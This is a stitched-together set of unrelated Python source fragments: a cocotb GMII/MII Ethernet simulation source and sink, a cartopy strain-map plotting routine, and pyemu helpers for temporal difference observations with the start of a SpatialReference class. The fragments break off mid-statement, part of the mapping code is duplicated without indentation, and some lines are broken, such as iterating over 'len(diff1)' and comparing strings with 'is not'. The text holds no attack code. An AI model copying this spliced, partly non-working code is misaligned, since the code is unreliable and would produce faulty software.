self.data.value = 0
if self.er is not None:
self.er.value = 0
self.dv.value = 0
if self.current_frame:
self.log.warning("Flushed transmit frame during reset: %s", self.current_frame)
self.current_frame.handle_tx_complete()
self.current_frame = None
if self.queue.empty():
self.idle_event.set()
else:
self.log.info("Reset de-asserted")
if self._run_cr is None:
self._run_cr = cocotb.start_soon(self._run())
async def _run(self):
    """Transmit coroutine: drive data/er/dv one unit per rising clock edge.

    Dequeues frames, optionally converts bytes to MII nibbles, enforces an
    inter-frame gap (IFG) after each frame, and drives idle values between
    frames. Runs forever; killed/restarted by _handle_reset().
    """
    frame = None
    frame_offset = 0
    frame_data = None
    frame_error = None
    ifg_cnt = 0
    self.active = False
    clock_edge_event = RisingEdge(self.clock)
    while True:
        await clock_edge_event
        # Only advance when there is no enable signal or it is high.
        if self.enable is None or self.enable.value:
            if ifg_cnt > 0:
                # in IFG
                ifg_cnt -= 1
            elif frame is None and not self.queue.empty():
                # send frame
                frame = self.queue.get_nowait()
                self.dequeue_event.set()
                self.queue_occupancy_bytes -= len(frame)
                self.queue_occupancy_frames -= 1
                self.current_frame = frame
                frame.sim_time_start = get_sim_time()
                frame.sim_time_sfd = None
                frame.sim_time_end = None
                self.log.info("TX frame: %s", frame)
                frame.normalize()
                # MII mode can be switched per-frame via the mii_select signal.
                if self.mii_select is not None:
                    self.mii_mode = bool(self.mii_select.value.integer)
                if self.mii_mode:
                    # convert to MII: split each byte into two nibbles
                    # (low nibble first) and duplicate the error flag.
                    frame_data = []
                    frame_error = []
                    for b, e in zip(frame.data, frame.error):
                        frame_data.append(b & 0x0F)
                        frame_data.append(b >> 4)
                        frame_error.append(e)
                        frame_error.append(e)
                else:
                    frame_data = frame.data
                    frame_error = frame.error
                self.active = True
                frame_offset = 0
            if frame is not None:
                d = frame_data[frame_offset]
                # Record SFD time the first time the SFD (byte or nibble) goes out.
                if frame.sim_time_sfd is None and d in (EthPre.SFD, 0xD):
                    frame.sim_time_sfd = get_sim_time()
                self.data.value = d
                if self.er is not None:
                    self.er.value = frame_error[frame_offset]
                self.dv.value = 1
                frame_offset += 1
                if frame_offset >= len(frame_data):
                    # Frame done: schedule at least one cycle of IFG.
                    ifg_cnt = max(self.ifg, 1)
                    frame.sim_time_end = get_sim_time()
                    frame.handle_tx_complete()
                    frame = None
                    self.current_frame = None
            else:
                # Idle: drive zeros and signal idle state.
                self.data.value = 0
                if self.er is not None:
                    self.er.value = 0
                self.dv.value = 0
                self.active = False
                self.idle_event.set()
class GmiiSink(Reset):
    """GMII/MII receive-side monitor.

    Samples ``data``/``er``/``dv`` on rising edges of ``clock`` and
    reassembles complete frames, which are queued for retrieval via
    :meth:`recv` / :meth:`recv_nowait`.
    """

    def __init__(self, data, er, dv, clock, reset=None, enable=None, mii_select=None, reset_active_level=True, *args, **kwargs):
        self.log = logging.getLogger(f"cocotb.{data._path}")
        self.data = data
        self.er = er
        self.dv = dv
        self.clock = clock
        self.reset = reset
        self.enable = enable
        self.mii_select = mii_select
        self.log.info("GMII sink")
        self.log.info("cocotbext-eth version %s", __version__)
        self.log.info("Copyright (c) 2020 <NAME>")
        self.log.info("https://github.com/alexforencich/cocotbext-eth")
        super().__init__(*args, **kwargs)
        self.active = False
        self.queue = Queue()
        self.active_event = Event()
        self.mii_mode = False
        self.queue_occupancy_bytes = 0
        self.queue_occupancy_frames = 0
        self.width = 8
        self.byte_width = 1
        # Sanity-check signal widths before starting.
        assert len(self.data) == 8
        if self.er is not None:
            assert len(self.er) == 1
        if self.dv is not None:
            assert len(self.dv) == 1
        self._run_cr = None
        self._init_reset(reset, reset_active_level)

    def _recv(self, frame, compact=True):
        # Internal: account for a frame leaving the queue.
        if self.queue.empty():
            self.active_event.clear()
        self.queue_occupancy_bytes -= len(frame)
        self.queue_occupancy_frames -= 1
        if compact:
            frame.compact()
        return frame

    async def recv(self, compact=True):
        """Wait for and return the next received frame."""
        frame = await self.queue.get()
        return self._recv(frame, compact)

    def recv_nowait(self, compact=True):
        """Return the next received frame; raises if none is available."""
        frame = self.queue.get_nowait()
        return self._recv(frame, compact)

    def count(self):
        """Return the number of received frames waiting in the queue."""
        return self.queue.qsize()

    def empty(self):
        """Return True if no received frames are waiting."""
        return self.queue.empty()

    def idle(self):
        """Return True when no frame is currently being received."""
        return not self.active

    def clear(self):
        """Discard all received frames and reset the occupancy counters."""
        while not self.queue.empty():
            self.queue.get_nowait()
        self.active_event.clear()
        self.queue_occupancy_bytes = 0
        self.queue_occupancy_frames = 0

    async def wait(self, timeout=0, timeout_unit=None):
        """Wait for receive activity; return immediately if frames are queued.

        Args:
            timeout: maximum time to wait (0 waits indefinitely).
            timeout_unit: units for *timeout* (passed to Timer).
        """
        if not self.empty():
            return
        if timeout:
            await First(self.active_event.wait(), Timer(timeout, timeout_unit))
        else:
            await self.active_event.wait()

    def _handle_reset(self, state):
        # Reset callback from the Reset mixin; state is True while asserted.
        if state:
            self.log.info("Reset asserted")
            if self._run_cr is not None:
                self._run_cr.kill()
                self._run_cr = None
            self.active = False
        else:
            self.log.info("Reset de-asserted")
            if self._run_cr is None:
                self._run_cr = cocotb.start_soon(self._run())

    async def _run(self):
        # Sampling loop: capture data/dv/er each rising clock edge while enabled.
        frame = None
        self.active = False
        clock_edge_event = RisingEdge(self.clock)
        while True:
            await clock_edge_event
            if self.enable is None or self.enable.value:
                d_val = self.data.value.integer
                dv_val = self.dv.value.integer
                er_val = 0 if self.er is None else self.er.value.integer
                if frame is None:
                    if dv_val:
                        # start of frame
                        frame = GmiiFrame(bytearray(), [])
                        frame.sim_time_start = get_sim_time()
                else:
                    if not dv_val:
                        # end of frame
                        if self.mii_select is not None:
                            self.mii_mode = bool(self.mii_select.value.integer)
                        if self.mii_mode:
                            # MII: samples are nibbles; reassemble bytes,
                            # re-aligning nibble parity on the SFD.
                            odd = True
                            sync = False
                            b = 0
                            be = 0
                            data = bytearray()
                            error = []
                            for n, e in zip(frame.data, frame.error):
                                odd = not odd
                                b = (n & 0x0F) << 4 | b >> 4
                                be |= e
                                if not sync and b == EthPre.SFD:
                                    odd = True
                                    sync = True
                                if odd:
                                    data.append(b)
                                    error.append(be)
                                    be = 0
                            frame.data = data
                            frame.error = error
                        frame.compact()
                        frame.sim_time_end = get_sim_time()
                        self.log.info("RX frame: %s", frame)
                        self.queue_occupancy_bytes += len(frame)
                        self.queue_occupancy_frames += 1
                        self.queue.put_nowait(frame)
                        self.active_event.set()
                        frame = None
                if frame is not None:
                    # Record SFD time on the first SFD byte (or nibble in MII).
                    if frame.sim_time_sfd is None and d_val in (EthPre.SFD, 0xD):
                        frame.sim_time_sfd = get_sim_time()
                    frame.data.append(d_val)
                    frame.error.append(er_val)
class GmiiPhy:
def __init__(self, txd, tx_er, tx_en, tx_clk, gtx_clk, rxd, rx_er, rx_dv, rx_clk,
reset=None, reset_active_level=True, speed=1000e6, *args, **kwargs):
self.gtx_clk = gtx_clk
self.tx_clk = tx_clk
self.rx_clk = rx_clk
super().__init__(*args, **kwargs)
self.tx = GmiiSink(txd, tx_er, | |
llx0, llx1, lly0, lly1 = ax.get_extent(ccrs.PlateCarree())
sbllx = (llx1 + llx0) / 2
sblly = lly0 + (lly1 - lly0) * scale_loc[1]
tmc = ccrs.TransverseMercator(sbllx, sblly)
x0, x1, y0, y1 = ax.get_extent(tmc)
sbx = x0 + (x1 - x0) * scale_loc[0]
sby = y0 + (y1 - y0) * scale_loc[1]
# print(sbx, sby)
sbxe = ((sbx + length * 500)/5)*2
sbxf = round(sbx - length * 500)
j = sbxf
k = 1
while k <= 5:
bar_xs = [j, j + sbxe]
if k % 2 == 0:
ax.plot(bar_xs, [sby, sby], transform=tmc, solid_capstyle='butt', color='w', linewidth=15, zorder=10)
else:
ax.plot(bar_xs, [sby, sby], transform=tmc, solid_capstyle='butt', color='k', linewidth=15, zorder=11)
j += sbxe
k += 1
buffer = [patheffects.withStroke(linewidth=1.5, foreground="w")]
hei_ = kwargs.get('hei_', 5)
ax.text(-1*sbxf, sby+(hei_*sby), str(length) + ' km', transform=tmc, fontsize=12,
family='Arial', path_effects=buffer, horizontalalignment='left', verticalalignment='bottom')
ax.text(sbxf, sby+(hei_*sby), '0 km', transform=tmc, fontsize=12,
family='Arial', path_effects=buffer, horizontalalignment='right', verticalalignment='bottom')
# Add Colors to site locations
color_list = kwargs.get('color_list', ['g', 'b', 'r'])
arrows = kwargs.get('arrows', 'show')
for i in range(len(sites)):
plt.draw()
lon, lat = sites.longitude[i], sites.latitude[i]
trans = ccrs.PlateCarree()._as_mpl_transform(ax)
x, y = trans.transform_point((lon, lat))
x_ = ((x/my_dpi))/width
y_ = ((y/my_dpi))/height
axi = fig.add_axes([(x_ - (5/width)*0.5), (y_ - (5/height)*0.5), (5/width), (5/height)])
colors = color_list
scale_arrow = kwargs.get('scale_arrow', 40)
if arrows == 'show':
axi.quiver(sites['E velocity (mm/yr)'][i], sites['N velocity (mm/yr)'][i], scale=scale_arrow, width=0.0175, headwidth=3.5, color='k')
axi.plot(0, 0, marker='o', markersize=10, color=colors[i])
axi.axis('equal')
axi.axis('off')
sites_h = []
for i in range(3):
site_0 = Line2D([0], [0], marker='o', color='b', linestyle='--',fillstyle='full', markeredgecolor='red',
markeredgewidth=0.0, label=sites.site[i], markerfacecolor=color_list[i], markersize=15)
sites_h.append(site_0)
# Set Legend Location
loc_ = kwargs.get('loc', 'upper center')
# Add Legend
leg = ax.legend(handles=[sites_h[0], sites_h[1], sites_h[2]], ncol=3, loc=loc_, fontsize="x-large")
leg.get_frame().set_edgecolor('k')
leg.get_frame().set_linewidth(0.5)
leg.get_frame().set_alpha(0.75)
# Add Strain Ellipse
if V is not 'off':
plt.draw()
lon, lat = lonc, latc
trans = ccrs.PlateCarree()._as_mpl_transform(ax)
x, y = trans.transform_point((lon, lat))
x_ = ((x/my_dpi))/width
y_ = ((y/my_dpi))/height
ax2 = fig.add_axes([(x_), (y_), 0.2, 0.2])
ax2.set_xlim([-1,1])
ax2.set_ylim([-1,1])
strain_viz.def_ellipse(self, V)
ax2.axis('equal')
ax2.axis('off')
p1 = ax.get_position()
p2 = ax2.get_position()
ax2.set_position([x_ - (p2.width/2 + shiftx), y_ - (p2.height/2 + shifty), p2.width, p2.height])
axn = fig.add_axes([(x_), (y_), 0.05, 0.05])
buffer = [patheffects.withStroke(linewidth=4, foreground="w")]
axn.text(0.5, 0.0,u'\u25B2 \nN ', ha='center', fontsize=35, family='Arial', path_effects=buffer, rotation = 0)
axn.axis('equal')
axn.axis('off')
p3 = ax.get_position()
p4 = axn.get_position()
axn.set_position([p3.x0 + (0.05*p3.x1), p3.y0 + (0.05*p3.y1), 0.05, 0.05])
save_fig = kwargs.get('save_fig', None)
if save_fig is not None:
plt.savefig(str(save_fig), edgecolor='k', bbox_inches='tight')
def symbol_map(self, **kwargs):
    """Plot the strain network on a tiled basemap with a scale bar, site
    markers, legend, north arrow and (optionally) a principal-strain map
    symbol at the network centre.

    Keyword Args (selected):
        ax, fig: existing cartopy axes / figure; created when ``ax`` is None.
        bounds (float): padding in degrees around the site extent (default 0.5).
        length (int): scale-bar length in km (default 25).
        color_list (list): marker colors for the three sites.
        arrows (str): 'show' to draw per-site velocity arrows (default 'off').
        e1, e2 (float): principal strains; both must be given to draw the
            map symbol.
        save_fig (str): path to save the figure, if given.

    NOTE(review): assumes ``self.strain_data`` holds exactly three sites with
    ``longitude``/``latitude``/``site`` and velocity columns -- TODO confirm.
    """
    sites = self.strain_data
    ax = kwargs.get('ax', None)
    fig = kwargs.get('fig', None)
    end_sites = strain_viz.end_df(sites)
    lonc, latc = strain_viz.get_center(sites)
    # To shift the Strain Ellipse about the center
    shiftx = kwargs.get('shiftx', 0)
    shifty = kwargs.get('shifty', 0)
    # Pick tiler type (http://maps.stamen.com/)
    map_tile_type = kwargs.get('map_tile_type', 'terrain-background')
    tiler = cimgt.Stamen(map_tile_type)
    mercator = tiler.crs
    if ax is None:
        # To shift the Strain Ellipse about the center
        shiftx = kwargs.get('shiftx', 0)
        shifty = kwargs.get('shifty', 0)
        bound_ = kwargs.get('bounds', 0.5)
        figx = kwargs.get('figx', 15)
        figy = kwargs.get('figy', 15)
        fig = plt.figure(figsize=(figx, figy))
        ax = fig.add_subplot(1, 1, 1, projection=mercator)
        ax.set_extent([sites.longitude.max()+bound_, sites.longitude.min()-bound_, sites.latitude.min()-bound_, sites.latitude.max()+bound_], crs=ccrs.PlateCarree())
    # Tiler Size
    tiler_size = kwargs.get('tiler_size', 1)
    ax.add_image(tiler, tiler_size, interpolation='spline36')
    ax.set_aspect(1, 'datalim')
    ax.gridlines(draw_labels=True)
    # Draw the network outline and site markers in lon/lat coordinates.
    plt.plot(sites.longitude, sites.latitude, color='blue', linestyle='--', linewidth=2, marker=',', transform=ccrs.PlateCarree(), zorder=20)
    plt.plot(end_sites.longitude, end_sites.latitude, color='blue', linestyle='--', linewidth=2, marker=',', transform=ccrs.PlateCarree(), zorder=20)
    plt.plot(sites.longitude, sites.latitude, color='black', linewidth=0, marker=',', transform=ccrs.PlateCarree(), label=sites.site, zorder=20)
    # Figure geometry (inches / dpi), used to place the small inset axes.
    bbox = fig.get_window_extent().transformed(fig.dpi_scale_trans.inverted())
    width, height = bbox.width, bbox.height
    my_dpi = fig.dpi
    length = kwargs.get('length', 25)
    scale_loc = kwargs.get('scale_loc', (0.5, 0.05))
    # Build a striped scale bar in a local transverse Mercator projection.
    llx0, llx1, lly0, lly1 = ax.get_extent(ccrs.PlateCarree())
    sbllx = (llx1 + llx0) / 2
    sblly = lly0 + (lly1 - lly0) * scale_loc[1]
    tmc = ccrs.TransverseMercator(sbllx, sblly)
    x0, x1, y0, y1 = ax.get_extent(tmc)
    sbx = x0 + (x1 - x0) * scale_loc[0]
    sby = y0 + (y1 - y0) * scale_loc[1]
    sbxe = ((sbx + length * 500)/5)*2
    sbxf = round(sbx - length * 500)
    j = sbxf
    k = 1
    # Five alternating black/white segments make up the bar.
    while k <= 5:
        bar_xs = [j, j + sbxe]
        if k % 2 == 0:
            ax.plot(bar_xs, [sby, sby], transform=tmc, solid_capstyle='butt', color='w', linewidth=15, zorder=10)
        else:
            ax.plot(bar_xs, [sby, sby], transform=tmc, solid_capstyle='butt', color='k', linewidth=15, zorder=11)
        j += sbxe
        k += 1
    buffer = [patheffects.withStroke(linewidth=2.5, foreground="w")]
    hei_ = kwargs.get('hei_', 5)
    ax.text(-1*sbxf, sby+(hei_*sby), str(length) + ' km', transform=tmc, fontsize=12,
            family='Arial', path_effects=buffer, horizontalalignment='left', verticalalignment='bottom')
    ax.text(sbxf, sby+(hei_*sby), '0 km', transform=tmc, fontsize=12,
            family='Arial', path_effects=buffer, horizontalalignment='right', verticalalignment='bottom')
    # Add Colors to site locations
    color_list = kwargs.get('color_list', ['g', 'b', 'r'])
    arrows = kwargs.get('arrows', 'off')
    for i in range(len(sites)):
        plt.draw()
        lon, lat = sites.longitude[i], sites.latitude[i]
        # Convert the site's lon/lat to figure-fraction coordinates.
        trans = ccrs.PlateCarree()._as_mpl_transform(ax)
        x, y = trans.transform_point((lon, lat))
        x_ = ((x/my_dpi))/width
        y_ = ((y/my_dpi))/height
        # Small inset axes centred on the site for the marker (and arrow).
        axi = fig.add_axes([(x_ - (5/width)*0.5), (y_ - (5/height)*0.5), (5/width), (5/height)])
        colors = color_list
        scale_arrow = kwargs.get('scale_arrow', 40)
        if arrows == 'show':
            axi.quiver(sites['E velocity (mm/yr)'][i], sites['N velocity (mm/yr)'][i], scale=scale_arrow, width=0.0175, headwidth=3.5, color='k')
        axi.plot(0, 0, marker='o', markersize=10, color=colors[i])
        axi.axis('equal')
        axi.axis('off')
    # Proxy artists so the legend shows one entry per site.
    sites_h = []
    for i in range(3):
        site_0 = Line2D([0], [0], marker='o', color='b', linestyle='--',fillstyle='full', markeredgecolor='red',
                        markeredgewidth=0.0, label=sites.site[i], markerfacecolor=color_list[i], markersize=15)
        sites_h.append(site_0)
    # Set Legend Location
    loc_ = kwargs.get('loc', 'upper center')
    # Add Legend
    leg = ax.legend(handles=[sites_h[0], sites_h[1], sites_h[2]], ncol=3, loc=loc_, fontsize="x-large")
    leg.get_frame().set_edgecolor('k')
    leg.get_frame().set_linewidth(0.5)
    leg.get_frame().set_alpha(0.75)
    plt.draw()
    # Add in the e1 and e2 symbols
    e1 = kwargs.get('e1', None)
    e2 = kwargs.get('e2', None)
    #e_loc = kwargs.get('e_loc', 'lower left')
    e_rot = kwargs.get('e_rot', 0)
    old_range = kwargs.get('old_range', [0.1, 300])
    new_range_a = kwargs.get('new_range_a', [40, 80])
    new_range_b = kwargs.get('new_range_b', [10, 15])
    max_strain = kwargs.get('max_strain', 300)
    min_strain = kwargs.get('min_strain', 0.1)
    # Add Map Symbol
    if None not in (e1, e2):
        plt.draw()
        lon, lat = lonc, latc
        trans = ccrs.PlateCarree()._as_mpl_transform(ax)
        x, y = trans.transform_point((lon, lat))
        x_ = ((x/my_dpi))/width
        y_ = ((y/my_dpi))/height
        ax2 = fig.add_axes([(x_), (y_), (5/width), (5/height)])
        ax2.set_xlim([-1,1])
        ax2.set_ylim([-1,1])
        strain_viz.map_symbol(self, e1, e2, rot=e_rot, old_range=old_range, new_range_a=new_range_a, new_range_b=new_range_b, max_strain=max_strain, min_strain=min_strain, ax=ax2)
        ax2.axis('equal')
        #ax2.axis('off')
        p1 = ax.get_position()
        p2 = ax2.get_position()
        # Re-centre the symbol axes on the network centre (plus user shift).
        ax2.set_position([x_ - (p2.width/2 + shiftx), y_ - (p2.height/2 + shifty), p2.width, p2.height])
        ax2.autoscale(False)
    plt.draw()
    # North arrow in its own small axes, pinned near the map's lower-left.
    axn = fig.add_axes([(x_), (y_), 0.05, 0.05])
    buffer = [patheffects.withStroke(linewidth=4, foreground="w")]
    axn.text(0.5, 0.0,u'\u25B2 \nN ', ha='center', fontsize=35, family='Arial', path_effects=buffer, rotation = 0)
    axn.axis('equal')
    axn.axis('off')
    p3 = ax.get_position()
    p4 = axn.get_position()
    axn.set_position([p3.x0 + (0.05*p3.x1), p3.y0 + (0.05*p3.y1), 0.05, 0.05])
    save_fig = kwargs.get('save_fig', None)
    if save_fig is not None:
        plt.savefig(str(save_fig), edgecolor='k', bbox_inches='tight')
def scale_arrow(value, old_range, new_range):
    """Linearly map *value* from *old_range* onto *new_range*.

    The fractional position within *old_range* is taken as an absolute
    value, so values below the old minimum still map into the new range
    rather than below it.
    """
    old_lo, old_hi = old_range
    new_lo, new_hi = new_range
    fraction = abs((value - old_lo) / (old_hi - old_lo))
    return new_lo + fraction * (new_hi - new_lo)
def scale_arrow_percent(value, old_range):
    """Return the absolute fractional position of *value* within *old_range*."""
    lo, hi = old_range
    return abs((value - lo) / (hi - lo))
def map_symbol(self, e1, e2, **kwargs):
# Add Figure to plot
ax = kwargs.get('ax', 'none')
rot = kwargs.get('rot', 0)
old_range = kwargs.get('old_range', [0.1, 300])
new_range_a = kwargs.get('new_range_a', [40, 80])
new_range_b = kwargs.get('new_range_b', [10, 15])
max_strain = kwargs.get('max_strain', 300)
min_strain = kwargs.get('min_strain', 0.1)
sz_e1 = strain_viz.scale_arrow(e1 * 10**9, old_range, new_range_a)
sz_e2 = strain_viz.scale_arrow(e2 * 10**9, old_range, new_range_a)
sz_e1_d = strain_viz.scale_arrow(e1 * 10**9, old_range, new_range_b)
sz_e2_d = strain_viz.scale_arrow(e2 * 10**9, old_range, new_range_b)
sz_p_e1 = strain_viz.scale_arrow(e1 * 10**9, [min_strain, max_strain], [0.2, 0.6])
sz_p_e2 = strain_viz.scale_arrow(e2 * 10**9, [min_strain, max_strain], [0.2, 0.6])
scale_arrow_percent_0 = strain_viz.scale_arrow(e1 * 10**9, [min_strain, max_strain], [0.2, 0.6])
boxstyle0_d = f"darrow,pad=%s" % (scale_arrow_percent_0)
scale_arrow_percent_1 = strain_viz.scale_arrow(e2 * 10**9, [min_strain, max_strain], [0.2, 0.6])
boxstyle1_d = f"darrow,pad=%s" % (scale_arrow_percent_1)
#scale_arrow_percent_1 = str(round(strain_viz.scale_arrow_percent(e2 * 10**9, old_range), 1))
#boxstyle1_l = f"larrow,pad=%s" % (scale_arrow_percent_1)
#boxstyle1_r = f"rarrow,pad=%s" % (scale_arrow_percent_1)
if ax == 'none':
fig = plt.figure(figsize=(5, 5))
ax = fig.add_subplot(1, 1, 1)
ax.spines['left'].set_position('center')
ax.spines['right'].set_color('none')
ax.spines['bottom'].set_position('center')
ax.spines['top'].set_color('none')
ax.xaxis.set_ticks_position('bottom')
ax.yaxis.set_ticks_position('left')
ax.set_xlim([-1,1])
ax.set_ylim([-1,1])
if (e1 == 0) and (e2 < 0):
rot0 = mtrans.Affine2D().rotate_deg(rot)
x0, y0 = rot0.transform_point((0.0, sz_p_e2))
x1, y1 = rot0.transform_point((0.0, -sz_p_e2))
ax.annotate("",
xy=(0.0, 0.0),
xytext=(x0, y0), textcoords='data',
size=sz_e2, va="center", ha="center", color='k',
arrowprops=dict(arrowstyle="simple, head_length=0.35,head_width=0.5,tail_width=0.2", fc="k", ec='k', lw=2))
ax.annotate("",
xy=(0.0,0.0),
xytext=(x1, y1),
size=sz_e2, va="center", ha="center", color='k',
arrowprops=dict(arrowstyle="simple, head_length=0.35,head_width=0.5,tail_width=0.2", fc="k", ec='k', lw=2))
elif (e1 > 0) and (e2 == 0):
bbox_props1 = dict(boxstyle=boxstyle0_d, fc="w", ec="k", lw=3)
sz_text1 = "---------------" + ('-' * int(20*float(scale_arrow_percent_1)))
ax.text(0.0, 0.0, sz_text1, ha="center", va="center", rotation=rot + 90,
size=sz_e1_d, color='w',
bbox=bbox_props1)
elif | |
matters for the differencing. If False, then
the control file order is used. If observation names have a datetime suffix, make sure the format is
year-month-day to use this sorting. Default is True
long_names (`bool`, optional): flag to use long, descriptive names by concating the two observation names
that are being differenced. This will produce names that are too long for tradtional PEST(_HP).
Default is True.
prefix (`str`, optional): prefix to prepend to observation names and group names. Default is "dif".
Returns:
tuple containing
- **str**: the forward run command to execute the binary file process during model runs.
- **pandas.DataFrame**: a dataframe of observation information for use in the pest control file
Note:
this is the companion function of `helpers.apply_temporal_diff_obs()`.
"""
if not os.path.exists(ins_file):
raise Exception(
"setup_temporal_diff_obs() error: ins_file '{0}' not found".format(ins_file)
)
# the ins routines will check for missing obs, etc
try:
ins = pyemu.pst_utils.InstructionFile(ins_file, pst)
except Exception as e:
raise Exception(
"setup_temporal_diff_obs(): error processing instruction file: {0}".format(
str(e)
)
)
if out_file is None:
out_file = ins_file.replace(".ins", "")
# find obs groups from the obs names in the ins that have more than one observation
# (cant diff single entry groups)
obs = pst.observation_data
if include_zero_weight:
group_vc = pst.observation_data.loc[ins.obs_name_set, "obgnme"].value_counts()
else:
group_vc = obs.loc[
obs.apply(lambda x: x.weight > 0 and x.obsnme in ins.obs_name_set, axis=1),
"obgnme",
].value_counts()
groups = list(group_vc.loc[group_vc > 1].index)
if len(groups) == 0:
raise Exception(
"setup_temporal_diff_obs() error: no obs groups found "
+ "with more than one non-zero weighted obs"
)
# process each group
diff_dfs = []
for group in groups:
# get a sub dataframe with non-zero weighted obs that are in this group and in the instruction file
obs_group = obs.loc[obs.obgnme == group, :].copy()
obs_group = obs_group.loc[
obs_group.apply(
lambda x: x.weight > 0 and x.obsnme in ins.obs_name_set, axis=1
),
:,
]
# sort if requested
if sort_by_name:
obs_group = obs_group.sort_values(by="obsnme", ascending=True)
# the names starting with the first
diff1 = obs_group.obsnme[:-1].values
# the names ending with the last
diff2 = obs_group.obsnme[1:].values
# form a dataframe
diff_df = pd.DataFrame({"diff1": diff1, "diff2": diff2})
# build up some obs names
if long_names:
diff_df.loc[:, "obsnme"] = [
"{0}_{1}__{2}".format(prefix, d1, d2) for d1, d2 in zip(diff1, diff2)
]
else:
diff_df.loc[:, "obsnme"] = [
"{0}_{1}_{2}".format(prefix, group, c) for c in len(diff1)
]
# set the obs names as the index (per usual)
diff_df.index = diff_df.obsnme
# set the group name for the diff obs
diff_df.loc[:, "obgnme"] = "{0}_{1}".format(prefix, group)
# set the weights using the standard prop of variance formula
d1_std, d2_std = (
1.0 / obs_group.weight[:-1].values,
1.0 / obs_group.weight[1:].values,
)
diff_df.loc[:, "weight"] = 1.0 / (np.sqrt((d1_std ** 2) + (d2_std ** 2)))
diff_dfs.append(diff_df)
# concat all the diff dataframes
diff_df = pd.concat(diff_dfs)
# save the dataframe as a config file
config_file = ins_file.replace(".ins", ".diff.config")
f = open(config_file, "w")
if include_path:
# ins_path = os.path.split(ins_file)[0]
# f = open(os.path.join(ins_path,config_file),'w')
f.write(
"{0},{1}\n".format(os.path.split(ins_file)[-1], os.path.split(out_file)[-1])
)
# diff_df.to_csv(os.path.join(ins_path,config_file))
else:
f.write("{0},{1}\n".format(ins_file, out_file))
# diff_df.to_csv(os.path.join(config_file))
f.flush()
diff_df.to_csv(f, mode="a")
f.flush()
f.close()
# write the instruction file
diff_ins_file = config_file.replace(".config", ".processed.ins")
with open(diff_ins_file, "w") as f:
f.write("pif ~\n")
f.write("l1 \n")
for oname in diff_df.obsnme:
f.write("l1 w w w !{0}! \n".format(oname))
if include_path:
config_file = os.path.split(config_file)[-1]
diff_ins_file = os.path.split(diff_ins_file)[-1]
# if the corresponding output file exists, try to run the routine
if os.path.exists(out_file):
if include_path:
b_d = os.getcwd()
ins_path = os.path.split(ins_file)[0]
os.chdir(ins_path)
# try:
processed_df = apply_temporal_diff_obs(config_file=config_file)
# except Exception as e:
# if include_path:
# os.chdir(b_d)
#
# ok, now we can use the new instruction file to process the diff outputs
ins = pyemu.pst_utils.InstructionFile(diff_ins_file)
ins_pro_diff_df = ins.read_output_file(diff_ins_file.replace(".ins", ""))
if include_path:
os.chdir(b_d)
print(ins_pro_diff_df)
diff_df.loc[ins_pro_diff_df.index, "obsval"] = ins_pro_diff_df.obsval
frun_line = "pyemu.helpers.apply_temporal_diff_obs('{0}')\n".format(config_file)
return frun_line, diff_df
def apply_temporal_diff_obs(config_file):
    """Process an instruction-output file pair and compute difference observations.

    Args:
        config_file (`str`): configuration file written by
            `pyemu.helpers.setup_temporal_diff_obs`.

    Returns:
        `pandas.DataFrame`: the processed difference observations.

    Note:
        Writes `config_file.replace(".config", ".processed")`, an output file
        that can be read with the instruction file created by
        `pyemu.helpers.setup_temporal_diff_obs()` (this function's companion).
    """
    if not os.path.exists(config_file):
        raise Exception(
            "apply_temporal_diff_obs() error: config_file '{0}' not found".format(
                config_file
            )
        )
    # First line of the config names the ins/out file pair; the remainder is
    # a CSV of the difference-observation definitions.
    with open(config_file, "r") as cfg:
        header = cfg.readline().strip().split(",")
        ins_file, out_file = header[0], header[1]
        diff_df = pd.read_csv(cfg)
    if not os.path.exists(out_file):
        raise Exception(
            "apply_temporal_diff_obs() error: out_file '{0}' not found".format(out_file)
        )
    if not os.path.exists(ins_file):
        raise Exception(
            "apply_temporal_diff_obs() error: ins_file '{0}' not found".format(ins_file)
        )
    try:
        ins = pyemu.pst_utils.InstructionFile(ins_file)
    except Exception as e:
        raise Exception(
            "apply_temporal_diff_obs() error instantiating ins file: {0}".format(str(e))
        )
    try:
        out_df = ins.read_output_file(out_file)
    except Exception as e:
        raise Exception(
            "apply_temporal_diff_obs() error processing ins-out file pair: {0}".format(
                str(e)
            )
        )
    # Every observation named in the config must exist in the processed output.
    required = set(diff_df.diff1.to_list())
    required.update(set(diff_df.diff2.to_list()))
    missing = required - set(list(out_df.index.values))
    if len(missing) > 0:
        raise Exception(
            "apply_temporal_diff_obs() error: the following obs names in the config file "
            + "are not in the instruction file processed outputs :"
            + ",".join(missing)
        )
    # Look up both sides of each difference and form the residual.
    diff_df.loc[:, "diff1_obsval"] = out_df.loc[diff_df.diff1.values, "obsval"].values
    diff_df.loc[:, "diff2_obsval"] = out_df.loc[diff_df.diff2.values, "obsval"].values
    diff_df.loc[:, "diff_obsval"] = diff_df.diff1_obsval - diff_df.diff2_obsval
    processed_name = config_file.replace(".config", ".processed")
    diff_df.loc[:, ["obsnme", "diff1_obsval", "diff2_obsval", "diff_obsval"]].to_csv(
        processed_name, sep=" ", index=False
    )
    return diff_df
# Base URL of spatialreference.org, used to look up EPSG / proj4 definitions.
srefhttp = "https://spatialreference.org"
class SpatialReference(object):
"""
a class to locate a structured model grid in x-y space.
Lifted wholesale from Flopy, and preserved here...
...maybe slighlty over-engineered for here
Parameters
----------
delr : numpy ndarray
the model discretization delr vector
(An array of spacings along a row)
delc : numpy ndarray
the model discretization delc vector
(An array of spacings along a column)
lenuni : int
the length units flag from the discretization package
(default 2)
xul : float
the x coordinate of the upper left corner of the grid
Enter either xul and yul or xll and yll.
yul : float
the y coordinate of the upper left corner of the grid
Enter either xul and yul or xll and yll.
xll : float
the x coordinate of the lower left corner of the grid
Enter either xul and yul or xll and yll.
yll : float
the y coordinate of the lower left corner of the grid
Enter either xul and yul or xll and yll.
rotation : float
the counter-clockwise rotation (in degrees) of the grid
proj4_str: str
a PROJ4 string that identifies the grid in space. warning: case
sensitive!
units : string
Units for the grid. Must be either feet or meters
epsg : int
EPSG code that identifies the grid in space. Can be used in lieu of
proj4. PROJ4 attribute will auto-populate if there is an internet
connection(via get_proj4 method).
See https://www.epsg-registry.org/ or spatialreference.org
length_multiplier : float
multiplier to convert model units to spatial reference units.
delr and delc above will be multiplied by this value. (default=1.)
Attributes
----------
xedge : ndarray
array of column edges
yedge : ndarray
array of row edges
xgrid : ndarray
numpy meshgrid of xedges
ygrid : ndarray
numpy meshgrid of yedges
xcenter : ndarray
array of column centers
ycenter : ndarray
array of row centers
xcentergrid : ndarray
numpy meshgrid of column centers
ycentergrid : ndarray
numpy meshgrid of row centers
vertices : 1D array
